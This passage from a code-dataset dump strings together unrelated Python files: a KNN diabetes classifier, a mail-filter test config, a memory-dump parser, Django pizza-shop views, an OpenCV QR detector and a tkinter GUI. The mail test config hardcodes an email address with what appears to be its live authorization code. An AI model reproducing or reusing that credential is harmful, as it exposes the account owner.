pd.read_csv(\"../test-datasets/classification/pima-indians-diabetes.data.csv\",sep=\",\")\n\n#dataframe shuffling\ndataframe = dataframe.reindex(np.random.permutation(dataframe.index))\n\n#training set, test set splitting\ntrain_set = dataframe.sample(frac=0.8, random_state=200)\ntest_set = dataframe.drop(train_set.index)\n\n#training set features and target\nX_train = train_set[[\"no: of pregnancy\",\"plasma glucose concentration\",\"diastolic blood pressure(mmHg)\",\n\"triceps skin fold thickness(mm)\",\"2hr serum insulin (mu U/ml)\",\"BMI\",\"diabetes pedigree\",\"age\"]]\ny_train = train_set[[\"diabetic\"]]\n\n#test set features and target\nX_test = test_set[[\"no: of pregnancy\",\"plasma glucose concentration\",\"diastolic blood pressure(mmHg)\",\n\"triceps skin fold thickness(mm)\",\"2hr serum insulin (mu U/ml)\",\"BMI\",\"diabetes pedigree\",\"age\"]]\ny_test = test_set[[\"diabetic\"]]\n\n#inspect dataframe\nprint(dataframe.describe())\n\n#train the model with K-Nearest Neighbor algorithm with max neighbor 'n_neighbor'\ntraining_accuracy = []\ntest_accuracy = []\nneighbors_settings = range(1,5)\nfor n_neighbor in neighbors_settings:\n\tknn = KNeighborsClassifier(n_neighbors=n_neighbor)\n\tknn.fit(X_train, y_train)\n\ttraining_accuracy.append(knn.score(X_train, y_train))\n\ttest_accuracy.append(knn.score(X_test, y_test))\n\n#make predictions on the test set \nprediction = knn.predict(X_test)\n\n#determine the accuracy\nprint(\"Training set accuracy : \", training_accuracy)\nprint(\"Test set accuracy : \", test_accuracy)\nplt.plot(neighbors_settings, training_accuracy, color=\"blue\", label=\"training accuracy\")\nplt.plot(neighbors_settings, test_accuracy, color=\"red\", label=\"test accuracy\")\nplt.xlabel(\"No: of neighbors\")\nplt.ylabel(\"Accuracy\")\nplt.legend()\nplt.show()","sub_path":"knn/knn-cls-diabetes.py","file_name":"knn-cls-diabetes.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"299806867","text":"#coding:utf-8\nfrom common import baseinfo\n\nproxy_ip = baseinfo.BG8010FrontOpeIp\nmail_attach = baseinfo.mail_attach\n\n#smtp相关参数设置\nmail_sender = baseinfo.mail_sender # 发件人\nmail_receivers = baseinfo.mail_receivers # 收件人\nmail_cc = baseinfo.mail_cc # 抄送人\nmail_bcc = baseinfo.mail_bcc # 暗送人\nmail_host = proxy_ip # 设置服务器,发件人的服务器代理\nmail_port = baseinfo.mail_proxy_port # 设置服务器端口\nmail_user = baseinfo.mail_user # 邮件登录地址\nmail_pass = baseinfo.mail_pass # 授权码\ndeny_mail = 'jusontest@163.com'\ndeny_pwd = 'UMXDELUQAPUWQFNU'\n\n#pop3相关参数设置\n# 获取邮箱密码和对应邮箱POP3服务器,邮件地址跟收件人相同\npop3_email = baseinfo.pop3_email\npop3_pwd = baseinfo.pop3_pwd # 授权码\npop3_server_host = proxy_ip\npop3_server_port = baseinfo.pop3_server_port\n\ndeny_title = 'test'\ntitle = '我不是黑名单主题,测试多种类型(隔离的数据结构检查)'\ndeny_filename = 'test'\ndeny_extend = 'txt'\nfilename = '1'\nextend = 'xls'\ndeny_name_file = deny_filename + '.' + extend\ndeny_extend_file = filename + '.' + deny_extend\nfile = filename + '.' + extend\nattach_file = mail_attach + deny_name_file\nattach_extend = mail_attach + deny_extend_file\nattach_path = mail_attach + file\ncontext = '测试测试测试'\n\nmail_ip = proxy_ip + ':' + str(mail_port)\npop3_ip = proxy_ip + ':' + str(pop3_server_port)\n#配置检查\n#列表里面的顺序依次为:查询命令,预期结果\ncase1_step1={\n\"step1\":[\"cat /etc/jsac/customapp.stream\",mail_ip],\n\"step2\":[\"cat /etc/jsac/customapp.stream\",pop3_ip]\n}\ncase1_step11={\n\"step1\":[\"netstat -anp |grep tcp\",mail_ip],\n\"step2\":[\"netstat -anp |grep tcp\",pop3_ip]\n}\ncase1_step2={\n\"step1\":[\"cat /etc/jsac/filter.json\",\"allow-from\"],\n\"step2\":[\"cat /etc/jsac/filter.json\",mail_sender],\n\"step3\":[\"cat /etc/jsac/filter.json\",mail_receivers[0]],\n\"step4\":[\"cat /etc/jsac/filter.json\",\"deny-topic\"],\n\"step5\":[\"cat /etc/jsac/filter.json\",deny_title],\n\"step6\":[\"cat /etc/jsac/filter.json\",\"deny-basename\"],\n\"step7\":[\"cat /etc/jsac/filter.json\",deny_filename],\n\"step8\":[\"cat /etc/jsac/filter.json\",\"deny-suffix\"],\n\"step9\":[\"cat /etc/jsac/filter.json\",deny_extend]\n}\n\ndelcheck = {\n \"step1\": [\"cat /etc/jsac/filter.json\", \"mail\"]\n}","sub_path":"Case_rbm/iso_mail_check_alltype/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116606035","text":"# Expects Python 3.x (tested on 3.6.4)\r\n\r\n# imports here (if any)\r\nimport re\r\nimport struct\r\n\r\n# uncomment next two lines for debugging\r\n#import pdb\r\n#pdb.set_trace()\r\n\r\ndef getEprocess(fd):\r\n ''' Parses EPROCESS blocks\r\n Arguments: open file descriptor\r\n Returns: nothing\r\n \r\n '''\r\n # find EPROCESS headers\r\n E_P_HEADER = b'\\x03\\x00\\x1B\\x00\\x00\\x00\\x00\\x00'\r\n print(\"PROCESS PIDs and PPIDs\\n\")\r\n for match in re.finditer(E_P_HEADER, fd.read()):\r\n fd.seek(match.start()) # moves file pointer to start of E_block\r\n try:\r\n # Move to offset 132 and use struct.unpack to read two bytes at PID offset as variable pid\r\n fd.seek(131, 1)\r\n pid = struct.unpack('<2c', fi.read(2))\r\n except struct.error as err: # break out of while if the struct read fails\r\n break\r\n print('PID: ' + str(pid))\r\n\r\n # Dump PPID at offset + 332\r\n fd.seek(match.start())\r\n try:\r\n # Move to offset 332 and use struct.unpack to read two bytes at PPID offset as variable ppid\r\n fd.seek(331, 1)\r\n ppid = struct.unpack('<2c', fi.read(2))\r\n except struct.error as err: # break out of while if the struct read fails.\r\n break\r\n print('PPID: '+str(ppid)+'\\n')\r\n\r\ndef getEthread(fd):\r\n ''' Parses ETHREAD blocks\r\n Arguments: open file descriptor\r\n Returns: nothing\r\n \r\n '''\r\n # find ETHREAD headers\r\n E_T_HEADER = b'\\x06\\x00\\x70\\x00\\x00\\x00\\x00\\x00'\r\n print(\"THREAD parent process PIDs\\n\")\r\n for match in re.finditer(E_T_HEADER, fd.read()):\r\n fd.seek(match.start())\r\n try:\r\n # Move to offset 492 and use struct.unpack to read two bytes at PID offset as variable pid\r\n fd.seek(491, 1)\r\n pid = struct.unpack('<2c', fi.read(2))\r\n except struct.error as err: # break out of while if the struct read fails.\r\n break\r\n print('Parent PID: '+str(pid)+'\\n')\r\n\r\n# Local main for testing...\r\nif __name__ == '__main__':\r\n # open the file and call the function\r\n try:\r\n fi = open('vm.vmem', 'rb')\r\n except FileNotFoundError:\r\n print(\"File not found\")\r\n sys.exit(1)\r\n fi.seek(0)\r\n getEprocess(fi)\r\n fi.seek(0)\r\n getEthread(fi)\r\n fi.close()\r\n","sub_path":"Memory Parser/mem_parser.py","file_name":"mem_parser.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"453862432","text":"# core/urls.py\n\nfrom django.urls import path\nfrom .views import CreateView, DetailsView, CreateTransactionView, DetailsTransacitonView\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\n# (?P[0-9]+)/\nurlpatterns = [\n\tpath('produto/', CreateView.as_view(), name='create'),\n\tpath('produto//', DetailsView.as_view(), name='details'),\n\n\tpath('transaction/', CreateTransactionView.as_view(), name='transaction'),\n\tpath('transaction//', \n\t\tDetailsTransacitonView.as_view(), name='transaction_details'\n\t)\n\n\n]\n\n\nurlpatterns = format_suffix_patterns(urlpatterns)","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"303004762","text":"import curses\nclass control:\n def raw_input(self, stdscr, r, c, prompt_string):\n curses.echo()\n stdscr.addstr(r, c, prompt_string)\n stdscr.refresh()\n input = stdscr.getstr(r, c + 10, 50)\n return input\n\n\nclass math:\n def get_middle_line(self, col, string):\n o = int(col) / 2\n o -= len(string) / 2\n return o\n","sub_path":"window/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565807850","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom .models import Pizza, Cart\nfrom django.shortcuts import render, redirect\n\ndef index(request):\n allPizzas = Pizza.objects.all()\n cart = Cart.objects.all()\n\n template = loader.get_template('menu/index.html')\n context = {\n 'allPizzas': allPizzas,\n 'cart': cart,\n }\n return HttpResponse(template.render(context, request))\n\ndef addToCart(request, pizza_id, pizza_size):\n pizza = Pizza.objects.get(pk=pizza_id)\n newItem = Cart(pizzaId=pizza, size=pizza_size)\n newItem.save()\n return redirect('menu') \n\ndef delete(request):\n Cart.objects.all().delete() \n return redirect('menu') ","sub_path":"Django/gitpizza/menu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"652272086","text":"# -*- coding: utf-8 -*-\n\nimport cv2\nfrom cv2 import drawContours\nimport math\nimport numpy as np\n\nclass QR():\n def __init__(self, path_file):\n self.path_file = path_file\n self.img = cv2.imread(path_file, cv2.IMREAD_COLOR)\n\n\n # Basado en la siguiente solucion: http://dsynflo.blogspot.com.es/2014/10/opencv-qr-code-detection-and-extraction.html\n def detect_trim(self):\n # Convertimos la imagen a escala de grises\n gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)\n\n # Aplicamos un filtro de media para eliminar ruido\n gray = cv2.blur(gray, (8,8))\n\n #Generacion de gradiante X e Y del filtro sobel para la deteccion de bordes\n gradX = cv2.Sobel(gray, ddepth=cv2.CV_32F, dx=1, dy=0, ksize=-1)\n gradY = cv2.Sobel(gray, ddepth=cv2.CV_32F, dx=0, dy=1, ksize=-1)\n # al restar los valores y hacerle el valor absoulto tenemos una imagen de los filos\n # de la imagen\n gradient = cv2.subtract(gradX, gradY)\n gradient = cv2.convertScaleAbs(gradient)\n\n # blur and threshold the imagen\n blurred = cv2.bilateralFilter(gradient, 9, 75, 75)\n (_, thresh) = cv2.threshold(blurred, 0, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n \n # Aplicacion de operacion closed a la imagen\n # kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (15, 15))\n height, width = thresh.shape[:2]\n rate = (len(thresh)) / 30.\n scale_ratio = rate / width\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,\n (int(scale_ratio * width), \n int(scale_ratio * height)))\n '''\n clahe = cv2.createCLAHE(clipLimit=2)\n thresh = clahe.apply(thresh)\n '''\n # thresh = cv2.GaussianBlur(thresh, (3, 3), 0)\n closed = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)\n\n closed = cv2.erode(closed, None, iterations=8)\n closed = cv2.dilate(closed, None, iterations=8)\n \n cv2.imshow(\"closed\", closed )\n cv2.waitKey(0)\n cv2.destroyWindow(\"closed\")\n \n # Buscamos todos los contornos\n (_, cnts, _) = cv2.findContours(closed.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n\n # Obtenemos el de mayor area\n c = sorted(cnts, key=cv2.contourArea, reverse=True)[0]\n\n # Generamos un rectangulo dado el contorno\n rect = cv2.minAreaRect(c)\n\n # Obtenemos las coordenadas de los cuatro puntos del rectangulo\n box = np.int0(cv2.boxPoints(rect))\n # Obtenemos los puntos de recorte\n x0, x1, y0, y1 = self.recorta(box)\n # Recortamos la imagen\n cropped = self.img[y0:y1, x0:x1]\n\n # Actualizamos la imagen\n self.img = cropped\n\n \n def findAndRectify(self):\n '''\n Funcion que encuentra el barcode en una imagen a traves de contornos y posteriormente realiza su giro y\n correccion a traves de las cuatro esquinas\n :return:\n '''\n\n # Realizamos una copia de la imagen\n img_drawed = self.img.copy()\n\n # Realizamos la binarizacion de la imagen\n (_, binarized) = cv2.threshold(cv2.cvtColor(img_drawed, cv2.COLOR_RGBA2GRAY), 0, 255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n \n # Calculo de contornos, obteniendo tambien la herencia entre ellos\n (_, contours, hierarchy) = cv2.findContours(binarized, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # Inicializamos los contornos A, B, C los cuales guardaran los tres patrones de busuqeda\n mark = 0\n A = None\n B = None\n C = None\n # Eliminamos una profundidad a la herencia\n hierarchy = hierarchy[0]\n for i in range(len(contours)):\n # Obtenemos el polinomio aproximado de cada contorno\n approx = cv2.approxPolyDP(contours[i], cv2.arcLength(contours[i], True)*0.02, True)\n # Si es un cuadrilatero, entonces puede ser el patron de alineamiento\n if(len(approx) == 4):\n k = i\n c = 0\n # Procedemos a navegar en los hijos de los contornos, guardnado la profundidad en 'c'\n while hierarchy[k][2] != -1:\n k = hierarchy[k][2]\n c += 1\n # Si la profundidad es mayor de 2, entonces es un patron de alineamiento\n if c >= 2:\n # Asignamos el contorno encontrado a A, B o C en funcion de mark\n if mark == 0: A = i\n elif mark == 1: B = i\n elif mark == 2: C = i\n mark += 1\n\n '''\n # Este codigo permite pintar los contornos donde se contienen los patrones de busqueda\n color = (randint(0, 255), randint(0, 255), randint(0, 255))\n drawContours(img_drawed, contours, i, color, 2)\n '''\n\n # Si mark es 3, entonces hemos encontrado los tres patrones\n if mark == 3:\n # Obtenemos los contornos de cada patorn\n Ac = contours[A]\n Bc = contours[B]\n Cc = contours[C]\n\n # Calculamos el centro geometrico del contorno\n Acenter = self.centerByContour(Ac)\n Bcenter = self.centerByContour(Bc)\n Ccenter = self.centerByContour(Cc)\n\n '''\n # Este codigo permite pintar los centros estimados de los patrones\n cv2.circle(img_drawed, Acenter, 5, (0,0,255), 1)\n cv2.circle(img_drawed, Bcenter, 5, (0,0,255), 1)\n cv2.circle(img_drawed, Ccenter, 5, (0,0,255), 1)\n '''\n\n # Calculamos la distancia entre cada punto\n AB = cv2.norm(Acenter, Bcenter)\n BC = cv2.norm(Bcenter, Ccenter)\n CA = cv2.norm(Ccenter, Acenter)\n\n # Inicializamos los identificadores de patrones\n top = None\n median1 = None\n median2 = None\n\n # Si la distancia AB es mayor, entonces es la hipotenusa, C es el patron top\n if AB > BC and AB > CA:\n top = C\n median1 = A\n median2 = B\n # Si la distancia CA es mayor, entonces es la hipotenusa, B es el patron top\n elif CA > AB and CA > BC:\n top = B\n median1 = A\n median2 = C\n # Si la distancia BC es mayor, entonces es la hipotenusa, A es el patron top\n elif BC > AB and BC > CA:\n top = A\n median1 = B\n median2 = C\n\n '''\n # Pinta el patron top de un color, y los restantes de otro\n drawContours(img_drawed, contours[top], -1, (0,0,255), 2)\n drawContours(img_drawed, contours[median1], -1, (255,0,0), 2)\n drawContours(img_drawed, contours[median2], -1, (255,0,0), 2)\n '''\n\n #Obtenemos de nuevo los centros de cada patron de busqueda\n median1c = self.centerByContour(contours[median1])\n median2c = self.centerByContour(contours[median2])\n topc = self.centerByContour(contours[top])\n\n # Calculamos la distancia que hay desde topc a la recta formada por median1c y median2c\n dist = self.lineEquation(median1c, median2c, topc)\n # Calculamos la pendiente de la recta entre median1c y median2c, asi como un indicador de si es horizontal la recta\n align, slope = self.lineSlope(median1c, median2c)\n\n # Inicializamos los patrones de busqueda, esta vez encontrando cual esta a la derecha y cual esta abajo\n bottom = None\n right = None\n orientation = None\n\n # Si esta completamente alineado la recta\n if align == 0:\n bottom = median1\n right = median2\n # Si la pendiente es negativa y el punto esta por debajo\n elif slope < 0 and dist < 0:\n bottom = median1\n right = median2\n orientation = \"NORTH\"\n # Si la pendiente es positiva y el punto esta por debajo\n elif slope > 0 > dist:\n bottom = median2\n right = median1\n orientation = \"EAST\"\n # Si la pendiente es negativa y el punto esta por encima\n elif slope < 0 < dist:\n bottom = median2\n right = median1\n orientation = \"SOUTH\"\n # Si la pendiente es positiva y el punto esta por encima\n elif slope > 0 < dist:\n bottom = median1\n right = median2\n orientation = \"WEST\"\n\n '''\n # Mostramos los contornos con un color indicador para cada uno: TOP: RED, BOTTOM: BLUE, RIGHT: GREEN\n drawContours(img_drawed, contours[top], -1, (0,0,255), 2)\n drawContours(img_drawed, contours[bottom], -1, (255,0,0), 2)\n drawContours(img_drawed, contours[right], -1, (0,255,0), 2)\n '''\n \n # Calculamos los polinomios aproximados de los contornos, identificandolos\n top_v = cv2.approxPolyDP(contours[top], cv2.arcLength(contours[top], True)*0.02, True)\n bottom_v = cv2.approxPolyDP(contours[bottom], cv2.arcLength(contours[bottom], True)*0.02, True)\n right_v = cv2.approxPolyDP(contours[right], cv2.arcLength(contours[right], True)*0.02, True)\n\n '''\n # Mostramos los puntos del polinomio aproximado con un color indicando para cada uno: TOP: RED, BOTTOM: BLUE, RIGHT: GREEN\n drawContours(img_drawed, top_v, -1, (0,0,255), 5)\n drawContours(img_drawed, bottom_v, -1, (255,0,0), 5)\n drawContours(img_drawed, right_v, -1, (0,255,0), 5)\n '''\n\n # Ahora queremos calcular la cuarta esquina aproximada. Para ello necesitamos calcular el corte\n # De las rectas que contienen los puntos exteriores del patron derecho y de abajo\n\n # Calculamos los puntos del patron right mas alejados del centro de top\n right_p_lados = self.getVerticesMasAlejados(topc, right_v)\n # Calculamos los puntos del patron bottom ma salejados del centro de top\n bottom_p_lados = self.getVerticesMasAlejados(topc, bottom_v)\n\n # Calculamos la interseccion de las dos rectas dado los 4 puntos\n estimated_corner = self.getCorteDosRectas(right_p_lados[0], right_p_lados[1], bottom_p_lados[0], bottom_p_lados[1])\n\n '''\n # Mostramos la cuarta esquina aproximada\n cv2.circle(img_drawed, tuple(estimated_corner), 3, (0, 0, 255), -1)\n '''\n\n # Obtenemos el centro de bottom\n bottomc = self.centerByContour(contours[bottom])\n # Obtenemos el centro de c\n rightc = self.centerByContour(contours[right])\n\n # Para corregir la imagen, vamos a calcular los puntos externos de cada patron y posteriormente hacer una operacion afin\n\n # Para el punto externo de top, calculamos el punto mas lejano de top desde la cuarta esquina\n p1 = self.getMasAlejado(top_v, estimated_corner)\n # Para el punto externo de bottom, calculamos el punto mas lejano de bottom desde el centro de right\n p2 = self.getMasAlejado(bottom_v, rightc)\n # Para el punto externo de right, calculamos el punto mas lejano de right desde el centro de bottom\n p3 = self.getMasAlejado(right_v, bottomc)\n p4 = estimated_corner\n\n '''\n # Mostramos los cuatro puntos externos por donde se realiza la transformacion afin\n c = np.array([[p1],[p2],[p3],[p4]])\n drawContours(img_drawed, c, -1, (255, 0, 0), 4)\n '''\n\n # Calculamos las filas y columnas de la imagen\n rows, cols, _ = img_drawed.shape\n # Al ser un cuadrado, obtenemos el minimo valor entre ellos para usarlo como tamano\n size = rows if rows < cols else cols\n # Calculamos el factor reductor para que no ocupe toda la imagen\n size = 5*size/6\n # Valor para anadir un margen para tolerar errores en la transformacion afin\n margen = 40\n # Montamos los puntos a usar para la transformacion afin\n puntos1 = np.float32([list(p1), list(p2), list(p3)])\n\n '''\n # Pintamos los puntos que usaremos para la transformacion afin\n drawContours(img_drawed, np.array([[p1],[p2],[p3]]), -1, (255, 0, 0), 4)\n '''\n # Ahora indicamos a donde queremos desplazar los puntos anteriores\n puntos2 = np.float32([[margen,margen],[margen, size],[size,margen]])\n # Montamos la transformacion afin\n M = cv2.getAffineTransform(puntos1, puntos2)\n # Aplicamos la transformacion afin a la imagen, indicando como valor de background el blanco\n img_turned = cv2.warpAffine(img_drawed, M, (cols, rows), borderMode=cv2.BORDER_CONSTANT, borderValue=(255,255,255))\n\n\n\n cv2.imshow(\"Imagen sin girar\", img_drawed)\n cv2.waitKey(0)\n cv2.destroyWindow(\"Imagen sin girar\")\n\n cv2.imshow(\"Imagen girada\", img_turned)\n cv2.waitKey(0)\n cv2.destroyWindow(\"Imagen girada\")\n\n def show(self):\n ''' Funcion que muestra la imagen QR almacenada en el objeto '''\n cv2.imshow(\"QR\", self.img )\n cv2.waitKey(0)\n cv2.destroyWindow(\"QR\")\n\n def recorta(self, box):\n '''\n Funcion que devuelve los puntos para recortar dado un box\n :param box:\n :return: (x0, x1, y0, y1)\n '''\n x0 = box[0][0]\n x1 = box[0][0]\n y0 = box[0][0]\n y1 = box[0][0]\n for i in (range(len(box))):\n x0 = min(x0, box[i][0])\n x1 = max(x1, box[i][0])\n y0 = min(y0, box[i][1])\n y1 = max(y1, box[i][1])\n return x0, x1, y0, y1\n\n def lineSlope(self, p1, p2):\n '''\n Funcion que calcula la pendiente de la recta que pasa por los dos puntos, indicando si esta alineado o no\n :param p1:\n :param p2:\n :return: (align, slope)\n '''\n dx = p1[0] - p2[0]\n dy = p1[1] - p2[1]\n if dy != 0:\n return 1, dy/dx\n else:\n return 0, 0.0\n\n def centerByContour(self, c):\n '''\n Funcion que calcula el centro de un contorno\n :param c:\n :return: (x, y)\n '''\n m = cv2.moments(c)\n return int(m['m10'] / m['m00']), \\\n int(m['m01'] / m['m00'])\n\n def lineEquation(self, p1, p2, p3):\n '''\n Funcion que calcula la distancia de p3 hasta la recta P1P2\n :param p1:\n :param p2:\n :param p3:\n :return: distancia\n '''\n a = - (p2[1] - p1[1]) / (p2[0] - p1[0])\n b = 1.0\n c = -a*p1[0] - p1[1]\n return (a*p3[0] + b*p3[1] + c)/math.sqrt(a**2 + b**2)\n\n def getVerticesMasAlejados(self, points, point):\n '''\n Funcion que calcula los dos puntos mas lejanos de points desde point\n :param points:\n :param point:\n :return: ((x1,y1),(x2,y2))\n '''\n distances = {}\n for p in point:\n p = p[0]\n p = tuple(p)\n distances[p] = self.distanciaEuclidea(points, p)\n p1 = max(distances, key=distances.get)\n distances.pop(p1, None)\n p2 = max(distances, key=distances.get)\n return np.array(p1), np.array(p2)\n\n def distanciaEuclidea(self, p1, p2):\n '''\n Metodo que calcula la distancia euclidea entre dos puntos de dimension 2\n :param p1:\n :param p2:\n :return: distanciaEuclieda\n '''\n return math.sqrt((p2[0]-p1[0])**2 + (p2[1] - p1[1])**2)\n\n # http://stackoverflow.com/questions/3252194/numpy-and-line-intersections\n def getCorteDosRectas(self, pa1, pa2, pb1, pb2):\n '''\n Funcion que calcula la coordenada de corte de la recta PA1PA2 con PB1PB2\n :param pa1:\n :param pa2:\n :param pb1:\n :param pb2:\n :return: (x, y)\n '''\n def derp(a):\n b = np.empty_like(a)\n b[0] = -a[1]\n b[1] = a[0]\n return b\n\n da = pa2-pa1\n db = pb2-pb1\n dp = pa1-pb1\n dap = derp(da)\n denom = np.dot(dap, db)\n num = np.dot(dap, dp)\n res = (num / denom.astype(float))*db + pb1\n return [int(round(res[0])), int(round(res[1]))]\n\n '''\n '''\n def getMasAlejado(self, points, reference):\n '''\n Funcion que calcula el punto mas alejado en points desde reference\n :param points:\n :param reference:\n :return: (x, y)\n '''\n distances = {}\n for p in points:\n p = p[0]\n p = tuple(p)\n distances[p] = self.distanciaEuclidea(reference, p)\n return max(distances, key=distances.get)\n","sub_path":"D3/QR.py","file_name":"QR.py","file_ext":"py","file_size_in_byte":17120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293064533","text":"import os\nimport threading\nimport tkinter as tk\nimport tkinter.filedialog\nfrom tkinter import ttk\nfrom logic import execute_logic\n\nclass MainFrame(tk.Frame):\n\n def __init__(self, parent, app_title, *args, **kwargs):\n \"\"\"\n メインウィンドウ内のフレームを生成するコンストラクタ\n 下記の処理を実行する\n ・フレームの設定\n ・フレーム内に含まれるヴィジェット(ラベル・ボタンなど)の配置\n\n parameters\n ----------\n parent : tk.Tk\n フレームの親となるメインウィンドウ\n app_title : app_title\n アプリケーションのタイトル(GUIに表示される)\n *args : variable arguments\n Frameオブジェクトの初期化引数\n **kwargs : variable arguments\n Frameオブジェクトの初期化引数\n \"\"\"\n tk.Frame.__init__(self, parent, *args, **kwargs)\n self.parent = parent\n\n # titleラベル\n self.gui_title_label = tk.Label(self,\n text=app_title,\n font=('メイリオ', 32),\n bg='white',\n fg='limegreen')\n # titleラベルの設置(今回はplaceメソッドを使う)\n self.gui_title_label.place(x=80, y=30)\n\n # file entry (ファイルパスの表示部分)\n self.file_path = tk.StringVar()\n self.file_entry = tk.Entry(self,\n textvariable=self.file_path,\n font=('メイリオ', 10),\n width=55,\n bd=3)\n self.file_entry.place(x=80, y=110)\n\n # file選択ボタン\n self.file_button_img = tk.PhotoImage(file='./icons/folder.png')\n self.file_button = tk.Button(self,\n image=self.file_button_img,\n cursor='hand2')\n # ボタンがクリックされた際のコールバック関数をバインド(割り当て)\n self.file_button.bind('', self.file_button_clicked)\n self.file_button.place(x=540, y=107)\n # ツールチップの生成\n self.file_menu_ttp = CreateToolTip(self.file_button, \"入力ファイルを選択\")\n\n # 設定ボタン\n # 今回設定ウィンドウは実装しないので、コールバック関数は設定しない。\n self.setting_button_img = tk.PhotoImage(file='./icons/settings.png')\n self.setting_button = tk.Button(self,\n image=self.setting_button_img,\n cursor='hand2')\n self.setting_button.place(x=585, y=107)\n self.file_menu_ttp = CreateToolTip(self.setting_button, \"設定画面を開く\")\n\n # アプリケーション実行ボタン\n self.execute_button = tk.Button(self,\n text='アプリケーション実行',\n font=('メイリオ', 10),\n relief='raised',\n cursor='hand2',\n fg='limegreen',\n bg='snow',\n highlightbackground='limegreen',\n width=20)\n # マウスホバーで色を変化させる\n self.execute_button.bind('', self.hover_enter)\n self.execute_button.bind('', self.hover_leave)\n self.execute_button.bind('', self.execute_button_clicked)\n self.execute_button.place(x=250, y=160)\n\n\n def file_button_clicked(self, event):\n # xlsまたはxlsx形式のファイルを選択させる\n filetypes = [(\"Excelブック(.xlsx)\",\"*.xlsx\"),\n (\"Excelブック(.xls)\",\".xls\")]\n # ファイル選択ダイアログの初期フォルダ\n initialdir = os.path.abspath(os.path.dirname(__file__))\n path = tk.filedialog.askopenfilename(filetypes=filetypes,\n initialdir=initialdir)\n self.file_path.set(path)\n\n def hover_enter(self, event):\n # (注)mac, linuxではbuttonのbackgroundオプションが働かない\n self.execute_button.configure(fg='snow', bg='limegreen')\n\n def hover_leave(self, event):\n self.execute_button.configure(fg='limegreen', bg='snow')\n\n def execute_button_clicked(self, event):\n # スレッドの開始(GUIの描画更新のため)\n file_path = self.file_path.get()\n # アプリケーションの進捗確認(プログラスバー)ウィンドウの生成\n progress_window = tk.Toplevel(master=self.parent)\n progress_window.geometry('640x200+400+300')\n progress_window.title(\"アプリ実行進捗状況\")\n # MainFrame同様、フレーム内部のヴィジェットとコールバック関数をクラス化\n self.progress_frame = ProgressFrame(progress_window,\n file_path=file_path,\n bg=\"white\")\n self.progress_frame.pack(side=\"top\", fill=\"both\", expand=True)\n # メインロジックの実行\n self.progress_frame.execute_logic()\n progress_window.mainloop()\n\n\nclass ProgressFrame(tk.Frame):\n\n def __init__(self, parent, file_path, *args, **kwargs):\n \"\"\"\n プログレスウィンドウ内のフレームを生成するコンストラクタ\n 下記の処理を実行する\n ・フレームの設定\n ・フレーム内に含まれるヴィジェット(ラベル・ボタンなど)の配置\n\n parameters\n ----------\n parent : tk.Tk\n フレームの親となるメインウィンドウ\n file_path : str\n メインウィンドウで選択されたファイルのパス\n *args : variable arguments\n Frameオブジェクトの初期化引数\n **kwargs : variable arguments\n Frameオブジェクトの初期化引数\n \"\"\"\n tk.Frame.__init__(self, parent, *args, **kwargs)\n self.parent = parent\n self.file_path = file_path\n\n # 進捗状況ラベル\n self.progress_message = tk.StringVar()\n self.progress_message.set('アプリケーション実行中...')\n self.progress_label = tk.Label(self,\n font=('メイリオ', 12),\n textvariable=self.progress_message,\n bg='white',\n justify='left')\n self.progress_label.place(x=80, y=30)\n\n # プログレスバー\n # プログレスバーのスタイル設定\n s = ttk.Style()\n s.theme_use('clam')\n s.configure(\"green.Horizontal.TProgressbar\",\n foreground='limegreen',\n background='limegreen')\n # プログレスバーの配置\n self.progress_bar = ttk.Progressbar(self,\n style=\"green.Horizontal.TProgressbar\",\n orient='horizontal',\n length=400,\n mode='determinate')\n self.progress_bar.configure(maximum=100)\n self.progress_bar.place(x=80, y=120)\n\n\n def execute_logic(self):\n \"\"\"\n メインロジックの実行(描画更新のため、別スレッドで実行)\n 選択したファイルのパスと、プログレスバーのオブジェクトを渡す\n \"\"\"\n th = threading.Thread(target=execute_logic,\n args=(self.file_path,\n self.progress_bar,\n self.after_complete_process))\n th.start()\n\n def after_complete_process(self):\n \"\"\"\n メインロジックの終了時に実行する処理\n ここでは、完了メッセージと完了(OK)ボタンの表示を行う。\n \"\"\"\n # メッセージ\n self.progress_message.set('アプリケーションの実行が完了しました')\n # OKボタン\n self.ok_button = tk.Button(self,\n text='OK',\n font=('メイリオ', 10),\n relief='raised',\n cursor='hand2',\n fg='limegreen',\n bg='snow',\n highlightbackground='limegreen',\n width=10)\n self.ok_button.bind('', self.hover_enter)\n self.ok_button.bind('', self.hover_leave)\n self.ok_button.bind('', self.ok_button_clicked)\n self.ok_button.place(x=500, y=30)\n\n def hover_enter(self, event):\n # (注)mac, linuxではbuttonのbackgroundオプションが働かない\n self.ok_button.configure(fg='snow', bg='limegreen')\n\n def hover_leave(self, event):\n self.ok_button.configure(fg='limegreen', bg='snow')\n\n def ok_button_clicked(self, event):\n # progress windowの削除\n self.parent.destroy()\n\nclass CreateToolTip(object):\n\n def 